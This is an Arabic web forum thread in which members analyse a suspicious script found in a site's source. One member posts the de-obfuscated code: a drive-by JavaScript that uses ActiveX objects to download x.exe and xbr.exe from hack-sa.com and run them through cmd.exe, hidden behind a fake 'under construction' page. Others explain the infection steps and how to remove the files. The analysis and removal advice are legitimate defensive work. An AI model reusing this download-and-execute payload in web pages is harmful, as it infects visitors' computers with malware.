هذا فقط ماوجدته بالسورس كاملاً
تم حذف الكود من قبلي منعاً لانتشاره بين ضعاف النفوس
شئ عجيب !!
مع خبرتي بالجافا والـ PHP إلا أني اول مره اشوف هالكود !!
ممكن احد يفيدنا لاهنتم ؟ خاصة zizwar !!
هذا فقط ماوجدته بالسورس كاملاً
تم حذف الكود من قبلي منعاً لانتشاره بين ضعاف النفوس
شئ عجيب !!
مع خبرتي بالجافا والـ PHP إلا أني اول مره اشوف هالكود !!
ممكن احد يفيدنا لاهنتم ؟ خاصة zizwar !!
__________________
تابعني على Twitter
كود خطير يقوم بتنفيذ جافا سكريبت لتنزيل ملفين على جهاز الزائر
بعد مافكيته هذا اصله
يقوم بانزال ملفينكود:<script language=javascript> function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { aaa="ob"; bbb="je"; yyy="ct"; ccc="Adodb."; ddd="Stream"; eee="Microsoft."; fff="XMLHTTP"; ggg="o"; kkk="p"; mmm="e"; sss="n"; lj='http://www.hack-sa.com/x.exe'; var df=document.createElement(aaa+bbb+yyy); var x=df.CreateObject(eee+fff,""); var S=df.CreateObject(ccc+ddd,""); S.type=1; x.open("GET", lj,0); x.send(); mz1=gn(10000); S.Open(); ttt=x.responseBody; S.Write(ttt); S.SaveToFile(mz1,2); S.Close(); Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); } catch(i) { i=1; } </script> <script language=javascript> function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { aaa="ob"; bbb="je"; yyy="ct"; ccc="Adodb."; ddd="Stream"; eee="Microsoft."; fff="XMLHTTP"; ggg="o"; kkk="p"; mmm="e"; sss="n"; lj='http://www.hack-sa.com/xbr.exe'; S.type=1; x.open("GET", lj,0); x.send(); mz1=gn(10000); ttt=x.responseBody; S.Write(ttt); S.SaveToFile(mz1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); } catch(i) { i=1; } </script> <script type="text/jscript">function init() { document.write("<title>قريــبا !</title><p align=center> </p><p align=center><font size=7>الموقع تحت الانشأء </font><b><font size=7>.. !</font></b></p>");}window.onload = init;</script> <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
xbr.exe
و
x.exe
لذلك ابحث عن هذه الملفين في جهازك
ادخل على الويندوز من خلال safe mode
واحذفها
ملاحظه :
لقد قمت بحذف بعض الاسطر تحسبا من ضعاف النفوس
فكرة الفايروس كالتالي :
يقوم بتنزيل الملفات على الكاش في جهاز الزائر
يستخدم cmd او الدوس لنسخ الملفين الى مجلد system32
يستخدم ال register لوضع بيانات تنفيذ الملفات
يرجع يستخدم الدوس لتنفيذ الملفين
* شرحتها للافاده وايضا حذفت الاسطر المهمه لتشغيلها اي وجود الكود هنا بدون فائده
وارجو منك تعديل موضوعك وحذف بعض من الارقام حتى لايظهر الكود كامل عند فك التشفير
شكرا لك
طيب هل يعمل الكود مع الفايرفوكسالمشاركة الأصلية كتبت بواسطة MohDesign
__________________
تويتر فولورز بارخص الاسعار
بيض الله وجهك على المعلومة يا أستاذي MohDesign
وتم حذف الكود اعلاه منعاً للانتشار بين ضعاف النفوس
سبحان اللهالمشاركة الأصلية كتبت بواسطة Khlodi
كنت بسأل هالسؤال بس سبقتني
فعلاً بحثت بالكاش عن الملفين وبحثت عنهم أيضاً عن طريق البحث بالويندوز كاملاً
ولم أجد شيئاً
أيضاً اود ان اخبرك انني عندما قمت بفتح الصفحة اعطاني صفحة بيضاء فقط لاغير
مع انه بالكود يعطيك document.write لكني لم ار اي كتابة على المتصفح نهائياً
هل هذا معناه انه لايعمل مع الفايرفوكس ؟؟
__________________
تابعني على Twitter